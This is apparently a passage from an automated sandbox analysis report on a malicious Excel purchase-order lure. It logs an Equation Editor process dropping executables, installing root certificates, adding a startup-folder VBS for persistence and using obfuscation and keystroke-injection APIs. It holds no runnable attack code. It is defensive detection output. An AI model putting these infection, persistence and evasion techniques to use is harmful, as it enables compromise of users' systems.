Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Orden de compra 0001-00255454.xlam.xlsx

Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Source: Orden de compra 0001-00255454.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EFE76 push ecx; ret	5_3_029EFE89
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B30A76 push ecx; ret	5_2_00B30A89
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01010A76 push ecx; ret	8_2_01010A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C40C push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C50E push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E21D push ecx; ret	9_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C6BE push ebx; ret	9_2_0041C6BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01350A76 push ecx; ret	11_2_01350A89

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Roaming\negrett.exe	File created: C:\Users\user\AppData\Local\directory\name.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\negrett.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	8_2_0100F98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01081C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	8_2_01081C41
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	11_2_0134F98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	11_2_013C1C41

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
